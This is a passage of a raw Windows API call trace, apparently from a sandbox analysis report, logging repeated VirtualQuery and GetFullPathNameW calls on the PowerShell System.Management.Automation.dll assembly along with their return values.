AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.436] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.436] GetLastError () returned 0x0 [0054.436] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.436] GetLastError () returned 0x0 [0054.436] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.436] GetLastError () returned 0x0 [0054.436] VirtualQuery (in: lpAddress=0x2cd600, lpBuffer=0x2ce600, dwLength=0x1c | out: lpBuffer=0x2ce600*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.437] VirtualQuery (in: lpAddress=0x2cd598, lpBuffer=0x2ce598, dwLength=0x1c | out: lpBuffer=0x2ce598*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.437] VirtualQuery (in: lpAddress=0x2cd5d4, lpBuffer=0x2ce5d4, dwLength=0x1c | out: lpBuffer=0x2ce5d4*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.438] VirtualQuery (in: lpAddress=0x2cd598, lpBuffer=0x2ce598, dwLength=0x1c | out: lpBuffer=0x2ce598*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.438] VirtualQuery (in: lpAddress=0x2cd5d4, lpBuffer=0x2ce5d4, dwLength=0x1c | out: lpBuffer=0x2ce5d4*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.438] VirtualQuery (in: lpAddress=0x2cd5d4, lpBuffer=0x2ce5d4, dwLength=0x1c | out: lpBuffer=0x2ce5d4*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.439] VirtualQuery (in: lpAddress=0x2cd598, lpBuffer=0x2ce598, dwLength=0x1c | out: lpBuffer=0x2ce598*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.439] VirtualQuery (in: lpAddress=0x2cd5d4, lpBuffer=0x2ce5d4, dwLength=0x1c | out: lpBuffer=0x2ce5d4*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.439] VirtualQuery (in: lpAddress=0x2cd598, lpBuffer=0x2ce598, dwLength=0x1c | out: lpBuffer=0x2ce598*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.439] VirtualQuery (in: lpAddress=0x2cd5d4, lpBuffer=0x2ce5d4, dwLength=0x1c | out: lpBuffer=0x2ce5d4*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.439] VirtualQuery (in: lpAddress=0x2cd598, lpBuffer=0x2ce598, dwLength=0x1c | out: lpBuffer=0x2ce598*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.441] VirtualQuery (in: lpAddress=0x2cd5d4, lpBuffer=0x2ce5d4, dwLength=0x1c | out: lpBuffer=0x2ce5d4*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.441] VirtualQuery (in: lpAddress=0x2cd43c, lpBuffer=0x2ce43c, dwLength=0x1c | out: lpBuffer=0x2ce43c*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.441] VirtualQuery (in: lpAddress=0x2cd598, lpBuffer=0x2ce598, dwLength=0x1c | out: lpBuffer=0x2ce598*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.442] VirtualQuery (in: lpAddress=0x2cd5d4, lpBuffer=0x2ce5d4, dwLength=0x1c | out: lpBuffer=0x2ce5d4*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.442] VirtualQuery (in: lpAddress=0x2cd598, lpBuffer=0x2ce598, dwLength=0x1c | out: lpBuffer=0x2ce598*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.442] VirtualQuery (in: lpAddress=0x2cd5d4, lpBuffer=0x2ce5d4, dwLength=0x1c | out: lpBuffer=0x2ce5d4*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.442] CoCreateGuid (in: pguid=0x2ce948 | out: pguid=0x2ce948*(Data1=0xa7ad8d9b, Data2=0xd615, Data3=0x49a8, Data4=([0]=0xbb, [1]=0xe7, [2]=0x4b, [3]=0x77, [4]=0x9f, [5]=0x28, [6]=0x56, [7]=0xf0))) returned 0x0 [0054.442] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce058, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.442] GetLastError () returned 0x0 [0054.442] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce008, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.443] GetLastError () returned 0x0 [0054.443] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce008, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.443] GetLastError () returned 0x0 [0054.443] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce058, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.443] GetLastError () returned 0x0 [0054.443] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce008, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.443] GetLastError () returned 0x0 [0054.443] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce008, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.443] GetLastError () returned 0x0 [0054.443] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.443] GetLastError () returned 0x0 [0054.443] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.443] GetLastError () returned 0x0 [0054.443] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.443] GetLastError () returned 0x0 [0054.443] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2cde20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.443] GetLastError () returned 0x0 [0054.443] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2cddd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.443] GetLastError () returned 0x0 [0054.443] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2cddd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.443] GetLastError () returned 0x0 [0054.444] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.444] GetLastError () returned 0x0 [0054.444] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.444] GetLastError () returned 0x0 [0054.444] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.444] GetLastError () returned 0x0 [0054.444] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.444] GetLastError () returned 0x0 [0054.444] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.444] GetLastError () returned 0x0 [0054.444] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.444] GetLastError () returned 0x0 [0054.444] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.444] GetLastError () returned 0x0 [0054.444] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.444] GetLastError () returned 0x0 [0054.444] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.444] GetLastError () returned 0x0 [0054.444] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.444] GetLastError () returned 0x0 [0054.444] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce060, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.444] GetLastError () returned 0x0 [0054.444] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce060, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.444] GetLastError () returned 0x0 [0054.445] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.445] GetLastError () returned 0x0 [0054.445] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.445] GetLastError () returned 0x0 [0054.445] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.445] GetLastError () returned 0x0 [0054.445] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.445] GetLastError () returned 0x0 [0054.445] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.445] GetLastError () returned 0x0 [0054.445] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.445] GetLastError () returned 0x0 [0054.445] VirtualQuery (in: lpAddress=0x2cd600, lpBuffer=0x2ce600, dwLength=0x1c | out: lpBuffer=0x2ce600*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.446] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.446] GetLastError () returned 0x0 [0054.446] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.446] GetLastError () returned 0x0 [0054.446] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.446] GetLastError () returned 0x0 [0054.446] VirtualQuery (in: lpAddress=0x2cd600, lpBuffer=0x2ce600, dwLength=0x1c | out: lpBuffer=0x2ce600*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.446] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.446] GetLastError () returned 0x0 [0054.446] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.446] GetLastError () returned 0x0 [0054.446] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.446] GetLastError () returned 0x0 [0054.446] VirtualQuery (in: lpAddress=0x2cd600, lpBuffer=0x2ce600, dwLength=0x1c | out: lpBuffer=0x2ce600*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.447] VirtualQuery (in: lpAddress=0x2cd598, lpBuffer=0x2ce598, dwLength=0x1c | out: lpBuffer=0x2ce598*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.447] VirtualQuery (in: lpAddress=0x2cd5d4, lpBuffer=0x2ce5d4, dwLength=0x1c | out: lpBuffer=0x2ce5d4*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.448] VirtualQuery (in: lpAddress=0x2cd598, lpBuffer=0x2ce598, dwLength=0x1c | out: lpBuffer=0x2ce598*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.448] VirtualQuery (in: lpAddress=0x2cd5d4, lpBuffer=0x2ce5d4, dwLength=0x1c | out: lpBuffer=0x2ce5d4*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.448] VirtualQuery (in: lpAddress=0x2cd5d4, lpBuffer=0x2ce5d4, dwLength=0x1c | out: lpBuffer=0x2ce5d4*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.449] VirtualQuery (in: lpAddress=0x2cd598, lpBuffer=0x2ce598, dwLength=0x1c | out: lpBuffer=0x2ce598*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.449] VirtualQuery (in: lpAddress=0x2cd5d4, lpBuffer=0x2ce5d4, dwLength=0x1c | out: lpBuffer=0x2ce5d4*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.449] VirtualQuery (in: lpAddress=0x2cd598, lpBuffer=0x2ce598, dwLength=0x1c | out: lpBuffer=0x2ce598*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.449] VirtualQuery (in: lpAddress=0x2cd5d4, lpBuffer=0x2ce5d4, dwLength=0x1c | out: lpBuffer=0x2ce5d4*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.449] VirtualQuery (in: lpAddress=0x2cd598, lpBuffer=0x2ce598, dwLength=0x1c | out: lpBuffer=0x2ce598*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.450] VirtualQuery (in: lpAddress=0x2cd5d4, lpBuffer=0x2ce5d4, dwLength=0x1c | out: lpBuffer=0x2ce5d4*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.450] VirtualQuery (in: lpAddress=0x2cd43c, lpBuffer=0x2ce43c, dwLength=0x1c | out: lpBuffer=0x2ce43c*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.451] VirtualQuery (in: lpAddress=0x2cd598, lpBuffer=0x2ce598, dwLength=0x1c | out: lpBuffer=0x2ce598*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.451] VirtualQuery (in: lpAddress=0x2cd5d4, lpBuffer=0x2ce5d4, dwLength=0x1c | out: lpBuffer=0x2ce5d4*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.452] VirtualQuery (in: lpAddress=0x2cd598, lpBuffer=0x2ce598, dwLength=0x1c | out: lpBuffer=0x2ce598*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.452] VirtualQuery (in: lpAddress=0x2cd5d4, lpBuffer=0x2ce5d4, dwLength=0x1c | out: lpBuffer=0x2ce5d4*(BaseAddress=0x2cd000, 